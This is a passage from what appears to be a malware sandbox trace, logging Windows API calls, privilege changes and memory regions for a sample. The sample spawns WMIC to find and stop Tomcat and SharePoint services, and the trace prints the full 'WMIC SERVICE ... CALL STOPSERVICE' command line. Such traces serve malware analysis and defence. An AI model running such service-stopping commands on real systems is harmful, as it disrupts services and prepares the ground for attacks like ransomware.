lstrlenW (lpString="CALL") returned 4 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0110.570] lstrlenW (lpString="ASSOC") returned 5 [0110.570] lstrlenW (lpString="CALL") returned 4 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0110.570] WbemLocator:IUnknown:AddRef (This=0x1096a98) returned 0x3 [0110.570] lstrlenW (lpString="") returned 0 [0110.570] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0110.570] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.570] lstrlenW (lpString="LHNIWSJ") returned 7 [0110.570] GetCurrentThreadId () returned 0xdfc [0110.570] GetCurrentProcess () returned 0xffffffff [0110.570] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xd6f640 | out: TokenHandle=0xd6f640*=0x270) returned 1 [0110.570] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd6f63c | out: TokenInformation=0x0, ReturnLength=0xd6f63c) returned 0 [0110.571] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x1078bb8, TokenInformationLength=0x118, ReturnLength=0xd6f63c | out: TokenInformation=0x1078bb8, ReturnLength=0xd6f63c) returned 1 [0110.571] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x1078bb8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0110.571] CloseHandle (hObject=0x270) returned 1 [0110.571] lstrlenW (lpString="GET") returned 3 [0110.571] lstrlenW (lpString="CALL") returned 4 [0110.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0110.571] lstrlenW (lpString="LIST") returned 4 [0110.571] lstrlenW (lpString="CALL") returned 4 [0110.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0110.571] lstrlenW (lpString="SET") returned 3 [0110.571] lstrlenW (lpString="CALL") returned 4 [0110.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0110.571] lstrlenW (lpString="CALL") returned 4 [0110.571] lstrlenW (lpString="CALL") returned 4 [0110.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0110.571] ??0CHString@@QAE@XZ () returned 0xd6f600 [0110.571] GetCurrentThreadId () returned 0xdfc [0110.571] SysStringLen (param_1="\\\\") returned 0x2 [0110.571] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0110.571] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0110.571] SysStringLen (param_1="\\") returned 0x1 [0110.571] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0110.571] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0110.572] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1096a98, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x10c07d0) returned 0x0 [0110.579] CoSetProxyBlanket (pProxy=0x10c07d0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0110.579] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.579] ??0CHString@@QAE@XZ () returned 0xd6f5fc [0110.579] GetCurrentThreadId () returned 0xdfc [0110.579] lstrlenA (lpString="") returned 0 [0110.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1078b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0110.579] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.579] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.579] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x7a9d76c7 | out: _String="Select", _Context=0x7a9d76c7) returned="Select" [0110.579] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d76c7 | out: _String=0x0, _Context=0x7a9d76c7) returned="*" [0110.579] lstrlenW (lpString="FROM") returned 4 [0110.579] lstrlenW (lpString="*") returned 1 [0110.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0110.579] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d76c7 | out: _String=0x0, _Context=0x7a9d76c7) returned="from" [0110.579] lstrlenW (lpString="FROM") returned 4 [0110.579] lstrlenW (lpString="from") returned 4 [0110.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0110.579] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d76c7 | out: _String=0x0, _Context=0x7a9d76c7) returned="Win32_Service" [0110.580] IWbemServices:GetObject (in: This=0x10c07d0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xd6f5d4*=0x0, ppCallResult=0x0 | out: ppObject=0xd6f5d4*=0x111a4e8, ppCallResult=0x0) returned 0x0 [0110.610] IWbemClassObject:GetMethod (in: This=0x111a4e8, wszName="STOPSERVICE", lFlags=0, ppInSignature=0xd6f5e0, ppOutSignature=0xd6f5cc | out: ppInSignature=0xd6f5e0*=0x0, ppOutSignature=0xd6f5cc*=0x111a868) returned 0x0 [0110.610] IUnknown:Release (This=0x111a868) returned 0x0 [0110.610] IUnknown:Release (This=0x111a4e8) returned 0x0 [0110.610] ??0CHString@@QAE@XZ () returned 0xd6f4ac [0110.610] GetCurrentThreadId () returned 0xdfc [0110.610] lstrlenA (lpString="") returned 0 [0110.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1078b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0110.610] lstrlenA (lpString="") returned 0 [0110.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1078b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0110.610] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.610] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.610] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x7a9d767f | out: _String="Select", _Context=0x7a9d767f) returned="Select" [0110.610] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d767f | out: _String=0x0, _Context=0x7a9d767f) returned="*" [0110.610] lstrlenW (lpString="FROM") returned 4 [0110.610] lstrlenW (lpString="*") returned 1 [0110.610] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0110.611] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d767f | out: _String=0x0, _Context=0x7a9d767f) returned="from" [0110.611] lstrlenW (lpString="FROM") returned 4 [0110.611] lstrlenW (lpString="from") returned 4 [0110.611] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0110.611] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d767f | out: _String=0x0, _Context=0x7a9d767f) returned="Win32_Service" [0110.611] lstrlenA (lpString="SELECT * FROM ") returned 14 [0110.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x1079000, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0110.611] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0110.611] SysStringLen (param_1="Win32_Service") returned 0xd [0110.611] lstrlenA (lpString=" WHERE ") returned 7 [0110.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x1078d20, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0110.611] SysStringLen (param_1=" WHERE ") returned 0x7 [0110.611] SysStringLen (param_1="caption LIKE '%tomcat%'") returned 0x17 [0110.611] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0110.611] SysStringLen (param_1=" WHERE caption LIKE '%tomcat%'") returned 0x1e [0110.611] IWbemServices:ExecQuery (in: This=0x10c07d0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%tomcat%'", lFlags=48, pCtx=0x0, ppEnum=0xd6f4b4 | out: ppEnum=0xd6f4b4*=0x10e80f0) returned 0x0 [0110.619] CoSetProxyBlanket (pProxy=0x10e80f0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0110.620] IEnumWbemClassObject:Next (in: This=0x10e80f0, lTimeout=-1, uCount=0x1, apObjects=0xd6f4b8, puReturned=0xd6f4a4 | out: apObjects=0xd6f4b8*=0x0, puReturned=0xd6f4a4*=0x0) returned 0x1 [0111.108] IUnknown:Release (This=0x10e80f0) returned 0x0 [0111.110] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.110] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.110] GetCurrentThreadId () returned 0xdfc [0111.110] ??0CHString@@QAE@PBG@Z () returned 0xd6f670 [0111.110] ??YCHString@@QAEABV0@PBG@Z () returned 0xd6f670 [0111.110] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x1079060, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0111.110] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.110] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x1078a98, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0111.110] __iob_func () returned 0x77ac1208 [0111.110] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0111.112] __iob_func () returned 0x77ac1208 [0111.112] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0111.112] ??1CHString@@QAE@XZ () returned 0x1 [0111.112] IUnknown:Release (This=0x10c07d0) returned 0x0 [0111.112] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0111.112] _kbhit () returned 0x0 [0111.113] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0111.114] WbemLocator:IUnknown:Release (This=0x1096a98) returned 0x2 [0111.114] IUnknown:Release (This=0x10c0dc0) returned 0x0 [0111.114] IUnknown:Release (This=0x10c0690) returned 0x0 [0111.115] WbemLocator:IUnknown:Release (This=0x1096a98) returned 0x1 [0111.115] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0111.115] WbemLocator:IUnknown:Release (This=0x1096a98) returned 0x0 [0111.116] CoUninitialize () [0111.140] exit (_Code=0) [0111.141] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.141] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 211 os_tid = 0xe08 Thread: id = 212 os_tid = 0xe0c Thread: id = 213 os_tid = 0xe10 Thread: id = 214 os_tid = 0xe14 Process: id = "43" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x436c0000" os_pid = "0xe18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2849 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2850 start_va = 0x670000 end_va = 0x466ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2851 start_va = 0x4670000 end_va = 0x468ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 2852 start_va = 0x4690000 end_va = 0x4691fff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 2853 start_va = 0x46a0000 end_va = 0x46b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 2854 start_va = 0x46c0000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 2855 start_va = 0x4700000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2856 start_va = 0x4800000 end_va = 0x4803fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 2857 start_va = 0x4810000 end_va = 0x4810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004810000" filename = "" Region: id = 2858 start_va = 0x4820000 end_va = 0x4821fff entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 2859 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2860 start_va = 0x7f570000 end_va = 0x7f592fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f570000" filename = "" Region: id = 2861 start_va = 0x7f59a000 end_va = 0x7f59afff entry_point = 0x0 region_type = private name = "private_0x000000007f59a000" filename = "" Region: id = 2862 start_va = 0x7f59c000 end_va = 0x7f59cfff entry_point = 0x0 region_type = private name = "private_0x000000007f59c000" filename = "" Region: id = 2863 start_va = 0x7f59d000 end_va = 0x7f59ffff entry_point = 0x0 region_type = private name = "private_0x000000007f59d000" filename = "" Region: id = 2864 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2865 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2866 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2867 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2868 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2869 start_va = 0x4960000 end_va = 0x496ffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2870 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2871 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2872 start_va = 0x4b50000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 2873 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2914 start_va = 0x4670000 end_va = 0x467ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 2915 start_va = 0x4830000 end_va = 0x48edfff entry_point = 0x4830000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2916 start_va = 0x48f0000 end_va = 0x492ffff entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 2917 start_va = 0x4970000 end_va = 0x4a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 2918 start_va = 0x4b20000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 2919 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2920 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2921 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2922 start_va = 0x7f470000 end_va = 0x7f56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f470000" filename = "" Region: id = 2923 start_va = 0x7f597000 end_va = 0x7f599fff entry_point = 0x0 region_type = private name = "private_0x000000007f597000" filename = "" Region: id = 2924 start_va = 0x4680000 end_va = 0x4683fff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 2925 start_va = 0x4690000 end_va = 0x4693fff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 2926 start_va = 0x4c50000 end_va = 0x4f86fff entry_point = 0x4c50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 215 os_tid = 0xe1c [0111.313] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0111.313] __set_app_type (_Type=0x1) [0111.313] __p__fmode () returned 0x77ac4d6c [0111.313] __p__commode () returned 0x77ac5b1c [0111.313] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0111.313] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0111.313] GetCurrentThreadId () returned 0xe1c [0111.313] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x84 [0111.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0111.313] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0111.313] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.322] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.322] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x47ffdfc | out: phkResult=0x47ffdfc*=0x0) returned 0x2 [0111.322] VirtualQuery (in: lpAddress=0x47ffe03, lpBuffer=0x47ffdb4, dwLength=0x1c | out: lpBuffer=0x47ffdb4*(BaseAddress=0x47ff000, AllocationBase=0x4700000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.322] VirtualQuery (in: lpAddress=0x4700000, lpBuffer=0x47ffdb4, dwLength=0x1c | out: lpBuffer=0x47ffdb4*(BaseAddress=0x4700000, AllocationBase=0x4700000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0111.322] VirtualQuery (in: lpAddress=0x4701000, lpBuffer=0x47ffdb4, dwLength=0x1c | out: lpBuffer=0x47ffdb4*(BaseAddress=0x4701000, AllocationBase=0x4700000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0111.322] VirtualQuery (in: lpAddress=0x4703000, lpBuffer=0x47ffdb4, dwLength=0x1c | out: lpBuffer=0x47ffdb4*(BaseAddress=0x4703000, AllocationBase=0x4700000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.322] VirtualQuery (in: lpAddress=0x4800000, lpBuffer=0x47ffdb4, dwLength=0x1c | out: lpBuffer=0x47ffdb4*(BaseAddress=0x4800000, AllocationBase=0x4800000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0111.322] GetConsoleOutputCP () returned 0x1b5 [0111.322] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0111.322] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0111.322] _get_osfhandle (_FileHandle=1) returned 0x3c [0111.322] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0111.322] _get_osfhandle (_FileHandle=1) returned 0x3c [0111.322] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0111.323] _get_osfhandle (_FileHandle=1) returned 0x3c [0111.323] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0111.323] _get_osfhandle (_FileHandle=0) returned 0x38 [0111.323] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0111.323] _get_osfhandle (_FileHandle=0) returned 0x38 [0111.323] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0111.323] GetEnvironmentStringsW () returned 0x4b57de0* [0111.323] FreeEnvironmentStringsA (penv="A") returned 1 [0111.323] GetEnvironmentStringsW () returned 0x4b57de0* [0111.323] FreeEnvironmentStringsA (penv="A") returned 1 [0111.323] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47fed60 | out: phkResult=0x47fed60*=0x94) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x0, lpData=0x47fed6c*=0xa8, lpcbData=0x47fed68*=0x1000) returned 0x2 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x1, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x0, lpData=0x47fed6c*=0x1, lpcbData=0x47fed68*=0x1000) returned 0x2 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x0, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x40, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x40, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x0, lpData=0x47fed6c*=0x40, lpcbData=0x47fed68*=0x1000) returned 0x2 [0111.324] RegCloseKey (hKey=0x94) returned 0x0 [0111.324] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47fed60 | out: phkResult=0x47fed60*=0x94) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x0, lpData=0x47fed6c*=0x40, lpcbData=0x47fed68*=0x1000) returned 0x2 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x1, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x0, lpData=0x47fed6c*=0x1, lpcbData=0x47fed68*=0x1000) returned 0x2 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x0, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, 